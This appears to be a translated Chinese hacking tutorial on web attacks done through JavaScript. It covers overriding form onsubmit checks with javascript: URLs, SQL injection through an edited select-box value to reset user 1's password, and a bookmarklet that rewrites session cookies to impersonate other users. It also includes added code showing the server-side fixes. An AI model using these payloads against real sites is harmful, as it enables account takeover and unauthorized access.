Hack with JavaScript

-----------------------------------------------------------
Author: Invincible and Most Lonely [E.S.T]
Source: EvilOctal Security Team [E.S.T], China
Original source: unknown
Disclaimer: This article came to me in an e-mail from a friend abroad. The original author is dr_amado; it took me about an hour to translate it, so please credit the source if you repost it.

Hacking with JavaScript

This tutorial describes how to use JavaScript to bypass simple and slightly more advanced HTML form restrictions, and how to get around cookie/session checks.

Simple form restrictions

1. Bypassing required fields

You will often meet pages that refuse to submit a form until every field has been filled in, but these restrictions are easy to get around. Look at the page source, find the code for the form, and you will usually see an onsubmit attribute on the <form> tag. That attribute is what enforces the restriction. JavaScript can reach every element on a page, form elements included, so we can modify, delete or add any element of any page we are viewing.

In particular, we can clear the form's onsubmit attribute, after which the form submits without any of its checks.

The onsubmit attribute normally points to a function that checks the form data before the form is sent, for example:

function fcheck() {
    if (!form.readed.checked) {
        alert("You must accept the terms of service before registering!");
        form.readed.focus();
        return false;
    }
    ...
}

...
<form action="reg2.jsp" method="post" name="form" onsubmit="return fcheck()">
...
</form>

How such a check function is written is outside the scope of this article; look it up if you want to write one yourself. The point of the code above is that when a check fails (here a checkbox left unticked, but it could be a radio button, a select box or any other field) fcheck() returns false and the form is not submitted. So we replace the onsubmit attribute with something that always returns true. Either of the following works, where x is the form's index in document.forms:

document.forms[x].onsubmit = "return true;";

or, by name,

document.form.onsubmit = "return true;";

(Current browsers ignore a string assigned to an event-handler property and simply set the handler to null, which has the same effect: with no handler, the submit goes ahead. Assigning a function that returns true, or null directly, works everywhere.)

Either statement makes the form submit unconditionally; the question is how to execute it inside the page. The method used here is to type it into the address bar as a javascript: URL and press Enter:

javascript:document.form.onsubmit="return true;";

On its own this does not quite work: a javascript: URL whose expression evaluates to a value (here the string "return true;", the value of the assignment) replaces the current page with that value, and the form is gone. Wrapping the assignment in alert() makes the whole expression evaluate to undefined, so nothing is written to the page:

javascript:alert(document.form.onsubmit="return true;");

Running this pops up a dialog showing "return true;" instead of navigating away, and the form can now be submitted with any content you like. (Today's browsers strip a pasted javascript: prefix or refuse to run such URLs from the address bar; the same statement can be run from the developer-tools console, where the alert() wrapper is unnecessary, or saved as a bookmarklet.) The test below uses the registration page of a free Chinese webmail service as the example.

If you submit without entering a password, a dialog box appears (screenshot not included).

Following the method above, view the source and find the form tag:

<form action="reg2.jsp" method="post" name="form" onsubmit="return fcheck()">

The form's name is "form", so type the following into the address bar:

javascript:alert(document.form.onsubmit="return true;");

and press Enter (screenshot not included).

Now fill in the registration form again, leave the password field empty, and submit (screenshot not included).

It goes straight through. Readers can experiment further on their own.

2. Changing field values

Having changed the form's onsubmit attribute to do what we want, what other restrictions remain? By the same mechanism we can modify any object on the page, for example the value of a field:

javascript:alert(document.spamform.fieldname.value="dr_amado was here!");

or

javascript:alert(document.forms[x].fieldname.value="dr_amado was here!");

That is all there is to it: anything you think you can modify, you can. This applies equally to hidden fields, disabled fields and the options of a select box, none of which the server can trust any more than a plain text box.
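The bypass described in the two subsections above, and the server-side check that defeats it, as an added example that is not part of the original article. The browser's submit algorithm and the registration form are modelled as plain objects so the code runs in Node without a DOM; in a real page disableClientValidation() can be applied to the HTMLFormElement directly. The extra password check in fcheck(), the field names and the server-side handler are assumptions.

```javascript
// Constructed stand-in for the article's registration form (name="form",
// action="reg2.jsp"). Only the parts of the DOM the example needs are modelled.
function makeForm() {
  const form = {
    name: "form",
    action: "reg2.jsp",
    method: "post",
    elements: [
      { name: "username", type: "text", value: "" },
      { name: "password", type: "password", value: "" },
      { name: "readed", type: "checkbox", checked: false },
    ],
    noValidate: false,
    onsubmit: null,
  };
  // Equivalent of onsubmit="return fcheck()". The article's fcheck() checks the
  // terms checkbox; the password check is assumed from the demo that follows it.
  form.onsubmit = function fcheck() {
    const readed = form.elements.find((e) => e.name === "readed");
    const password = form.elements.find((e) => e.name === "password");
    if (!readed.checked) return false;
    if (password.value === "") return false;
    return true;
  };
  return form;
}

// What the attacker runs in the page. Setting the handler to null (what assigning
// the string "return true;" does in current browsers) removes the client-side check;
// noValidate additionally skips HTML5 `required`/`pattern` constraint validation.
function disableClientValidation(form) {
  form.onsubmit = null;
  form.noValidate = true;
  return form;
}

// Model of the browser's submit step: run the onsubmit handler, abort on false,
// otherwise serialise the fields. An unchecked checkbox is omitted from the body
// entirely, which is what a real browser sends.
function submit(form) {
  if (typeof form.onsubmit === "function" && form.onsubmit() === false) {
    return null; // submission cancelled by the handler
  }
  const body = {};
  for (const el of form.elements) {
    if (el.type === "checkbox") {
      if (el.checked) body[el.name] = "on";
    } else {
      body[el.name] = el.value;
    }
  }
  return body;
}

// Assumed handler for reg2.jsp: re-validates the request body and never assumes
// that fcheck() ran. This is the check the article's target was missing.
function validateRegistration(body) {
  const errors = [];
  if (!body.username) errors.push("username required");
  if (!body.password) errors.push("password required");
  if (body.readed !== "on") errors.push("terms not accepted");
  return errors;
}

function demo() {
  const form = makeForm();
  form.elements[0].value = "alice";
  const blocked = submit(form); // null: fcheck() refused the empty password
  disableClientValidation(form);
  const forged = submit(form); // arrives with an empty password and no "readed" key
  return { blocked, forged, errors: validateRegistration(forged) };
}
```

The forged body is exactly what reg2.jsp receives after the address-bar trick: the checkbox is absent rather than "off", so a server that only looks for readed === "off" would also be fooled. Only the re-validation in validateRegistration() rejects it.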

SQL injection

1. Through forms

You are all familiar with SQL injection; here I look at what happens when a form's input is not handled correctly.

Obtaining database information

A common way to get information about the system is to deliberately make an SQL query fail so that the error message reveals details of the site's database (what Chinese forums call "bursting the database"). Forms, dynamic links and session cookies are all places where such errors can be provoked. Most articles on SQL injection cover dynamic links and text boxes; in my experience the vulnerability is just as common in the other input types: select boxes, hidden fields, checkboxes and radio buttons, and cookies.

If values of mixed type are not properly escaped, the page is easy to break. For example, take a link such as "memberinfo.php?o_id=1" and append a double quote (") or a single quote ('). With luck you get debugging output that includes part of the SQL query. Once you have that, you can decide what to do next.

Changing a field value

The first form to look at is the user-profile page. Most profile pages are not well filtered, select boxes in particular. The attack is to put an SQL fragment into the value of such a field. In the address bar of IE:

javascript:alert(document.profileform.user_sex.value="Gay', user_password='hacked' WHERE user_id=1 #");

Suppose the server builds its query like this:

"UPDATE user_data SET user_password='$user_password', user_email='$user_email', user_sex='$user_sex' WHERE user_id=$user_id";

After our value is substituted, the query becomes:

"UPDATE user_data SET user_password='mypassword', user_email='mymail', user_sex='Gay', user_password='hacked' WHERE user_id=1 #' WHERE user_id=7382";

"#" starts a comment in MySQL, so the server's own WHERE clause (user_id=7382, the logged-in user) is ignored and the update lands on user_id 1, setting its password to "hacked". The server never checked that the submitted user_sex was one of the options the select box actually offered.
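The profile-update query from the passage above, built the vulnerable way (string interpolation) and the hardened way (allow-list plus placeholders), as an added example that is not part of the original article. The table and column names follow the text; the logged-in user_id 7382, the allowed select-box options, the $1-style placeholders and the simplified comment-stripping model of MySQL are assumptions.

```javascript
// Vulnerable: each submitted field is spliced straight into the SQL string,
// which is the server-side pattern the article describes.
function buildUpdateVulnerable(fields, sessionUserId) {
  return (
    "UPDATE user_data SET " +
    `user_password='${fields.user_password}', ` +
    `user_email='${fields.user_email}', ` +
    `user_sex='${fields.user_sex}' ` +
    `WHERE user_id=${sessionUserId}`
  );
}

// Rough model of what MySQL executes: from the first "#" outside a quoted string
// to the end of the statement is a comment and is dropped. Backslash-escaped
// quotes are not handled; enough to show the effect of the article's payload.
function stripMysqlComment(sql) {
  let inQuote = false;
  for (let i = 0; i < sql.length; i++) {
    const ch = sql[i];
    if (ch === "'") inQuote = !inQuote;
    else if (ch === "#" && !inQuote) return sql.slice(0, i).trimEnd();
  }
  return sql;
}

// Hardened: the select box's value is checked against the options the form
// actually offered (assumed list), and every value goes through a placeholder,
// so the SQL text never contains attacker-controlled characters.
const ALLOWED_SEX = new Set(["male", "female", "other"]);

function buildUpdateHardened(fields, sessionUserId) {
  if (!ALLOWED_SEX.has(fields.user_sex)) {
    throw new Error(`user_sex not in allow-list: ${JSON.stringify(fields.user_sex)}`);
  }
  return {
    text: "UPDATE user_data SET user_password=$1, user_email=$2, user_sex=$3 WHERE user_id=$4",
    values: [fields.user_password, fields.user_email, fields.user_sex, sessionUserId],
  };
}

// The value the article injects into the select box via the address bar.
const PAYLOAD = "Gay', user_password='hacked' WHERE user_id=1 #";

function demo() {
  // Constructed request body: what profileform sends after the value was edited.
  const submitted = { user_password: "mypassword", user_email: "mymail", user_sex: PAYLOAD };
  const raw = buildUpdateVulnerable(submitted, 7382);
  const executed = stripMysqlComment(raw);
  let hardenedError = null;
  try {
    buildUpdateHardened(submitted, 7382);
  } catch (e) {
    hardenedError = e.message;
  }
  return { raw, executed, hardenedError };
}
```

executed is the statement MySQL would run: the trailing "#' WHERE user_id=7382" is gone, the WHERE now targets user_id 1, and user_password is assigned twice with the attacker's value last. The hardened builder refuses the same body before any SQL is produced.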

2. Bypassing session cookies

Bypassing basic session-cookie checks

In many cases session handling relies on cookies. If the page does not handle its session cookies correctly, an attacker can use this to change their identity to that of another user.

A site's cookies are exposed to script in document.cookie. With JavaScript we can erase, edit and create cookies for any site we are visiting. This is a little more involved than the attacks above, so I will only introduce it briefly. (Cookies the server sets with the HttpOnly flag are not visible through document.cookie, so this only works on cookies set without that flag.)

Viewing cookies:

javascript:alert(unescape(document.cookie));

Modifying cookies. The following defines a function c(name, oldValue, newValue) on window that finds the named cookie, replaces oldValue with newValue inside it, writes it back and returns the new document.cookie; the three prompts ask for the cookie name, the value to replace and the replacement (the label of the third prompt was garbled in the source and is reconstructed here):

javascript:alert(window.c=function(n,v,nv){var c=document.cookie;c=c.substring(c.indexOf(n)+n.length,c.length);c=c.substring(1,((c.indexOf(";")>-1)?c.indexOf(";"):c.length));var nc=unescape(c).replace(v,nv);document.cookie=n+"="+escape(nc);return unescape(document.cookie);});alert(c(prompt("Cookie name:",""),prompt("Replace this value:",""),prompt("With this value:","")));

Suppose you log in to www.ima13370h4x0r.net as "John Doe" and receive this cookie:

sessiondata=a:3:{s:11:"sessionuser";s:5:"75959";s:9:"sessionid";i:70202768;s:9:"lastvisit";i:1078367189;}

Only the value "75959" matters: it is the user_id. You will often find sites that keep key data such as the user_id in a cookie, which is a serious vulnerability, because any user can change the value to another user's id, for instance the administrator's.

Once the window.c function above is declared, editing the value is easy. The cookie is a PHP-serialized array, in which each string is stored as s:<length>:"<value>", so replace s:5:"75959" with s:X:"adminid", where X is the length of the new value; to change 75959 to 1, for example, change s:5:"75959" to s:1:"1". If the length prefix is left at 5 the server fails to unserialize the cookie and the session is simply dropped. Some sites use the cookie value directly in the WHERE clause of an SQL query to keep the user logged in; in that case set 75959 to something like "13 or 1=1" (nine characters, so the prefix becomes s:9:).

Note:
Such inline JavaScript declarations can be saved as a browser bookmark (a bookmarklet), so you can define your own functions conveniently in the form:

alert(window.newfunction=function(){...})
